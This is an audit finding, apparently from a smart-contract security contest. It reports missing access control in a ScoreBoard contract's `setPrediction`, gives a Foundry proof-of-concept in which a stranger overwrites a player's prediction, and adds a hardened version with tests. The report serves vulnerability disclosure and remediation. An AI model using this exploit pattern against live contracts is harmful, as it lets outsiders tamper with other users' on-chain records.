Submission Details
Severity: high
Valid

Lack of access control in `ScoreBoard::setPrediction` allows a malicious user to change any player's prediction

**Description** Anyone can call the `setPrediction` function and alter the predictions made by the players. There is no access control in place to prevent this.

**Proof of Concept**
```solidity
function test_AlterPrediction() public {
    uint256 fee = 1 ether;
    address user = makeAddr("user");
    vm.deal(user, fee);

    // A legitimate player registers, gets approved and makes a prediction
    vm.prank(user);
    thePredicter.register{value: 0.04 ether}();
    vm.prank(organizer);
    thePredicter.approvePlayer(user);
    vm.prank(user);
    thePredicter.makePrediction(0, ScoreBoard.Result.Draw);

    // An unrelated address overwrites that player's prediction directly on ScoreBoard
    address mu = makeAddr("mu");
    vm.prank(mu);
    scoreBoard.setPrediction(user, 0, ScoreBoard.Result.First);
}
```
**Recommended Mitigation** There should be a conditional check that `(player == msg.sender || thePredicter == msg.sender)` before the prediction is written, reverting otherwise.
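As an added example, not the contest's own code, the sketch below shows the recommended check applied as a modifier on `setPrediction`, together with a Foundry test that confirms a stranger's call reverts and the player's original prediction survives. The function signature follows the PoC above; the contract name `ScoreBoardHardened`, the `predictions` storage layout, the `getPrediction` getter and the error name are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

/// Assumed minimal sketch of the relevant part of ScoreBoard (not the contest's code).
contract ScoreBoardHardened {
    enum Result { Pending, First, Draw, Second }
    uint256 private constant NUM_MATCHES = 9;

    address public thePredicter;                                  // assumed: the ThePredicter contract address
    mapping(address => Result[NUM_MATCHES]) private predictions;  // assumed storage layout

    error ScoreBoard__UnauthorizedAccess();

    constructor(address _thePredicter) {
        thePredicter = _thePredicter;
    }

    /// Only the player themself or the ThePredicter contract may write that player's prediction.
    modifier onlyPlayerOrPredicter(address player) {
        if (msg.sender != player && msg.sender != thePredicter) {
            revert ScoreBoard__UnauthorizedAccess();
        }
        _;
    }

    function setPrediction(address player, uint256 matchNumber, Result result)
        public
        onlyPlayerOrPredicter(player)
    {
        require(matchNumber < NUM_MATCHES, "invalid match number");
        predictions[player][matchNumber] = result;
    }

    function getPrediction(address player, uint256 matchNumber) external view returns (Result) {
        return predictions[player][matchNumber];
    }
}

/// Foundry test for the hardened contract (added here as illustration).
contract ScoreBoardHardenedTest is Test {
    ScoreBoardHardened board;
    address predicter = makeAddr("thePredicter");
    address user = makeAddr("user");
    address mu = makeAddr("mu");

    function setUp() public {
        board = new ScoreBoardHardened(predicter);
    }

    function test_PlayerCanSetOwnPrediction() public {
        vm.prank(user);
        board.setPrediction(user, 0, ScoreBoardHardened.Result.Draw);
        assertEq(uint8(board.getPrediction(user, 0)), uint8(ScoreBoardHardened.Result.Draw));
    }

    function test_PredicterContractCanSetPrediction() public {
        vm.prank(predicter);
        board.setPrediction(user, 1, ScoreBoardHardened.Result.Second);
        assertEq(uint8(board.getPrediction(user, 1)), uint8(ScoreBoardHardened.Result.Second));
    }

    function test_StrangerCannotAlterPrediction() public {
        vm.prank(user);
        board.setPrediction(user, 0, ScoreBoardHardened.Result.Draw);

        // The same call that succeeded in the PoC now reverts for an unrelated address
        vm.prank(mu);
        vm.expectRevert(ScoreBoardHardened.ScoreBoard__UnauthorizedAccess.selector);
        board.setPrediction(user, 0, ScoreBoardHardened.Result.First);

        // The player's original prediction is untouched
        assertEq(uint8(board.getPrediction(user, 0)), uint8(ScoreBoardHardened.Result.Draw));
    }
}
```

Run with `forge test --match-contract ScoreBoardHardenedTest`. The modifier takes `player` as an argument so the check is tied to the address being written, which is what distinguishes this from a plain `onlyThePredicter` modifier: players keep the ability to set their own predictions while nobody else can touch them.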
Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.
